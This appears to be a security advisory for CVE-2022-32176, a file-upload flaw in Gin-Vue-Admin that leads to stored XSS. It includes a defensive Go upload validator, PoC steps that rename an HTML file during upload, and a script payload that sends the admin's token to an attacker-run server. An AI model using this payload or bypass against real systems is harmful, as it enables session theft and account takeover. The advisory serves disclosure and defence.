CVE-2022-32176

Date: October 17, 2022

Overview

In "Gin-Vue-Admin", versions v2.5.1 through v2.5.3b are vulnerable to Unrestricted File Upload that leads to execution of JavaScript code, through the "Compress Upload" functionality of the Media Library. When an admin user views the uploaded file, a low-privilege attacker gains access to the admin's cookie, leading to account takeover.

Details

The "Gin-Vue-Admin" application is affected by the "Unrestricted File Upload" vulnerability: a low-privilege user can upload an HTML file containing malicious JavaScript code to the Media Library. When a victim views the file, the attacker gains access to the victim's cookie and therefore to the victim's account.
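As an added illustration (not Gin-Vue-Admin's own code), the following Go check shows the kind of validation that defeats the rename trick described above: the extension must be on an image allowlist, the file's leading bytes must sniff as that same image type, and stored files are served with headers that stop the browser from rendering them inline. All function and variable names are the example's own.

```go
package main

import (
	"fmt"
	"net/http"
	"path/filepath"
	"strings"
)

// allowedImageTypes maps each accepted upload extension to the MIME type that
// the file's leading bytes must sniff as. Any other extension is rejected.
var allowedImageTypes = map[string]string{
	".png":  "image/png",
	".jpg":  "image/jpeg",
	".jpeg": "image/jpeg",
	".gif":  "image/gif",
}

// ValidateUpload rejects an upload unless its extension is allow-listed AND its
// content sniffs as the matching image type. An HTML file renamed to .png fails
// the sniff check; a file left as .html fails the extension check.
func ValidateUpload(filename string, data []byte) error {
	ext := strings.ToLower(filepath.Ext(filename))
	want, ok := allowedImageTypes[ext]
	if !ok {
		return fmt.Errorf("extension %q is not an allowed image type", ext)
	}
	// DetectContentType inspects at most the first 512 bytes, never the name.
	if got := http.DetectContentType(data); got != want {
		return fmt.Errorf("content sniffs as %q but %q requires %q", got, ext, want)
	}
	return nil
}

// SafeDownloadHeaders returns headers a media endpoint should send so a browser
// downloads the stored file instead of rendering it, and never re-sniffs its type.
func SafeDownloadHeaders(storedName string) http.Header {
	h := http.Header{}
	h.Set("Content-Type", "application/octet-stream")
	h.Set("X-Content-Type-Options", "nosniff")
	h.Set("Content-Disposition", fmt.Sprintf("attachment; filename=%q", filepath.Base(storedName)))
	h.Set("Content-Security-Policy", "default-src 'none'; sandbox")
	return h
}

func main() {
	// Constructed sample inputs: a minimal PNG signature and a script snippet.
	png := []byte("\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR")
	html := []byte("<script>alert(1)</script>")
	fmt.Println("png as .png  :", ValidateUpload("avatar.png", png))
	fmt.Println("html as .png :", ValidateUpload("renamed.png", html))
	fmt.Println("html as .html:", ValidateUpload("page.html", html))
}
```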

PoC Details

1. Access the application from a web browser and log in as an admin user.
2. Open a private window and log in as a regular (Low privileges) user.
3. Go to the personal information page, click on the profile image, and then click on the 'Normal Upload' button.
4. Create a .png file with the code in the PoC code section below.
5. Create an HTTP server using Python (python3 -m http.server 3333).
6. Select the takeover2.png and intercept the request.
7. Change the name of takeover2.png to takeover2.html and forward the request.
8. Go to the Media Library (Upload and Download) from the admin account and open the takeover.html ('Open image in New Tab'). This will trigger the XSS payload from takeover.html and send the admin cookie to the attacker's server, leading to account takeover.

PoC Code

takeover2.png file:

<script>
var i=new Image;
i.src="http://127.0.0.1:3333/?"+localStorage.getItem('token');
</script>

Affected Environments

Gin-Vue-Admin versions v2.5.1 through v2.5.3b

Prevention

No Fix

Language: Go

Good to know:


Unrestricted Upload of File with Dangerous Type

CWE-434

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High